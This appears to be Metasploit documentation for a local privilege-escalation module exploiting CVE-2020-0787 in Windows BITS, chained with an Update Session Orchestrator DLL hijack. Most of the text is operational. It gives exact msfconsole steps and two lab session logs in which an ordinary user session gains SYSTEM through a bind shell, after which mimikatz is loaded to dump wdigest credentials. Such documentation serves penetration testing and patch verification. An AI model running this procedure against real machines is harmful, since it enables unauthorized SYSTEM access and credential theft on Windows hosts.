## Vulnerable Application
The Windows Background Intelligent Transfer Service (BITS), prior to the March 2020 update, did not apply impersonation
when an undocumented COM method, QueryNewJobInterface(), was called. This meant that the BITS temporary file that is
created when a job is created and added to the BITS job queue would be copied as the SYSTEM user. By abusing symbolic
links, an attacker can take advantage of this vulnerability to write arbitrary files to arbitrary locations as the SYSTEM
user.

This vulnerability affects all Windows versions from Windows 7 onwards, up to but not including Windows 10 v2004. Note
that exploiting the vulnerability on its own does not allow an attacker to gain privileges; rather an attacker must find
a DLL hijacking vulnerability or similar in a SYSTEM level service that they can exploit using the arbitrary file move
provided by CVE-2020-0787 in order to gain privileges.

Presently the module solves this issue by taking advantage of a DLL hijacking vulnerability within the Update Session
Orchestrator, a service that was introduced starting with Windows 10. By creating a file at
C:\Windows\System32\WindowsCoreDeviceInfo.dll, an attacker can ensure that when a Update Session is created
via the Update Session Orchestrator service, their malicious payload, located at C:\Windows\System32\WindowsCoreDeviceInfo.dll,
will be executed with SYSTEM permissions. Support for other LPE methods that affect other versions
of Windows may be added in the future.

### Installation And Setup
All affected systems should have the BITS service installed and running. If an affected system does not have the
the BITS service running, then the BITS service will need to be started on that host prior to exploiting this
vulnerability.

## Verification Steps
  1. Start msfconsole
  2. Get a session with basic privileges on a Windows 10 machine
  3. Do: ```use exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move```
  4. Do: ```set payload windows/x64/<payload>``` if the target is an x64 machine, or
  ```set payload windows/<payload>``` if the target is an x86 machine.
  5. Do: ```set SESSION <sess_no>```
  6. Do: ```set JOB_WAIT_TIME <seconds>``` to set the number of seconds you want to wait for the BITS job to complete.
  7. Do: Set the ```LPORT``` and ```RHOST``` options for the payload as needed.
  6. Do: ```run```
  7. You should get a shell running as SYSTEM a few seconds after the `JOB_WAIT_TIME` timer expires.

## Options
  **OVERWRITE_DLL**
  Overwrite WindowsCreDeviceInfo.dll if it exists (false by default).
  WindowsCoreDeviceInfo.dll is not present by default, but if it is
  present, it is likely loaded, so even with this set to true, the
  overwrite (and exploit) will likely end up failing.

  **JOB_WAIT_TIME**
  Amount of time, in seconds, to wait for CVE-2020-0787.x64.dll or CVE-2020-0787.x86.dll
  to finish running before attempting to load uso_trigger.x86.dll or uso_trigger.x64.dll
  to conduct the local privilege elevation. The main reason for configuring this option is
  that the BITS job that CVE-2020-0787.x64.dll or CVE-2020-0787.x86.dll will set up can
  take a long time to run depending on the load of the target computer, so this allows one
  to add some additional delay if needed to ensure the BITS job has successfully completed
  prior to attempting to conduct the LPE.

## Scenarios

### Windows 10 v1909 x64 - Build 18363.418
```
msf5 exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.26.22.128:4444
[*] Sending stage (201283 bytes) to 172.26.22.128
[*] Meterpreter session 2 opened (0.0.0.0:0 -> 172.26.22.128:4444) at 2020-06-10 12:00:00 -0500

meterpreter > getuid
Server username: DESKTOP-NRCNIDN\normal
meterpreter > sysinfo
Computer        : DESKTOP-NRCNIDN
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > use exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options

Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   JOB_WAIT_TIME  60               yes       Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds
   OVERWRITE_DLL  false            yes       Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).
   SESSION                         yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows DLL Dropper


msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set PAYLOAD windows/x64/meterpreter/bind_tcp
PAYLOAD => windows/x64/meterpreter/bind_tcp
msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options

Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   JOB_WAIT_TIME  60               yes       Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds
   OVERWRITE_DLL  false            yes       Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).
   SESSION                         yes       The session to run this module on.


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows DLL Dropper


msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set RHOST 172.26.22.128
RHOST => 172.26.22.128
msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set LPORT 9988
LPORT => 9988
msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options

Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   JOB_WAIT_TIME  60               yes       Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds
   OVERWRITE_DLL  false            yes       Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).
   SESSION                         yes       The session to run this module on.


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     9988             yes       The listen port
   RHOST     172.26.22.128    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows DLL Dropper


msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set SESSIOn 2
SESSIOn => 2
msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set JOB_WAIT_TIME 40
JOB_WAIT_TIME => 40
msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > exploit

[*] Step #1: Checking target environment...
[*] Step #2: Generating the malicious DLL...
[*] Payload DLL is 94208 bytes long
[*] Step #3: Loading the exploit DLL to run the main exploit...
[*] Sleeping for 40 seconds to allow the exploit to run...
[*] Started bind TCP handler against 172.26.22.128:9988
[*] Sending stage (201283 bytes) to 172.26.22.128
[*] Meterpreter session 3 opened (0.0.0.0:0 -> 172.26.22.128:9988) at 2020-06-10 12:03:39 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-NRCNIDN
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
DESKTOP-NRCNIDN$  WORKGROUP        (null)
normal            DESKTOP-NRCNIDN  (null)
test              DESKTOP-NRCNIDN  (null)


meterpreter >
```

### Windows 10 v1903 x86 - Build 18362.30

```
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     172.26.17.231    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.26.17.231:4444
[*] Sending stage (176195 bytes) to 172.26.17.231
[*] Meterpreter session 4 opened (0.0.0.0:0 -> 172.26.17.231:4444) at 2020-06-10 12:16:12 -0500

meterpreter > getuid
Server username: DESKTOP-PL99PE8\test
meterpreter > sysinfo
Computer        : DESKTOP-PL99PE8
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(multi/handler) > use exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set SESSION 4
SESSION => 4
msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > show options

Module options (exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   JOB_WAIT_TIME  40               yes       Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds
   OVERWRITE_DLL  false            yes       Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).
   SESSION        4                yes       The session to run this module on.


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     9988             yes       The listen port
   RHOST     172.26.22.128    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows DLL Dropper


msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set RHOST 172.26.17.231
RHOST => 172.26.17.231
msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set LPORT 8822
LPORT => 8822
msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > set JOB_WAIT_TIME 30
JOB_WAIT_TIME => 30
msf5 exploit(windows/local/cve_2020_0787_bits_arbitrary_file_move) > exploit

[*] Step #1: Checking target environment...
[*] Step #2: Generating the malicious DLL...
[*] Payload DLL is 78336 bytes long
[*] Step #3: Loading the exploit DLL to run the main exploit...
[*] Sleeping for 30 seconds to allow the exploit to run...
[*] Started bind TCP handler against 172.26.17.231:8822
[*] Sending stage (176195 bytes) to 172.26.17.231
[*] Meterpreter session 5 opened (0.0.0.0:0 -> 172.26.17.231:8822) at 2020-06-10 12:18:16 -0500

meterpreter > sysinfo
Computer        : DESKTOP-PL99PE8
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
DESKTOP-PL99PE8$  WORKGROUP        (null)
test              DESKTOP-PL99PE8  (null)


meterpreter >
```
